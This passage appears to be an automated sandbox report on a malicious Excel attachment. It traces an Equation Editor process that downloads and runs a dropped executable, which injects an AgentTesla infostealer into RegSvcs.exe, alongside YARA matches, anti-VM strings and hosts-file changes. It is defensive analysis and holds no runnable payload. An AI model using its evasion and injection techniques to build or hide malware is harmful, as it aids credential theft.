                    Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB070
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA8F8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9910
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC970
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EF14E
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EBA80
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5440
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E8740
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002ED808
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC959
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EF222
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9A04
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEA69
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEA78
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9AB3
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9A98
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE420
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5430
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE410
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EECA2
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EECB0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEF4A
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEF58
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002ED7F9
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C64DF
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C8DDD
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C3EF0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C43BF
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C0048
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C3010
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6D78
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C4D79
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6134
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6D91
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C4D88
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6E1A
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C3610
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6B78
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6771
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C7751
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E178A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00286048
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00285430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00282198
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00285778
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77620000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77740000 page execute and read and write
                    Source: Bank TT slip.xlsxMetadefender: Detection: 20%
                    Source: Bank TT slip.xlsxReversingLabs: Detection: 31%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Bank TT slip.xlsxJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR66EC.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\JHFJngVRuKk
                    Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC132 push edx; ret
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E8168 push ebx; ret
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C702F push ss; iretd
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C597F push eax; retf 0017h
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C029C push esp; ret
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C1359 pushfd ; iretd
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.02001355184
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.02001355184
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648Thread sleep time: -420000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 316Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 2428Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 504
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000
                    Source: EQNEDT32.EXE, 00000002.00000002.962418834.0000000000384000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: EQNEDT32.EXE, 00000002.00000002.962329452.000000000035B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0368067D mov edx, dword ptr fs:[00000030h]
                    Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processes
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
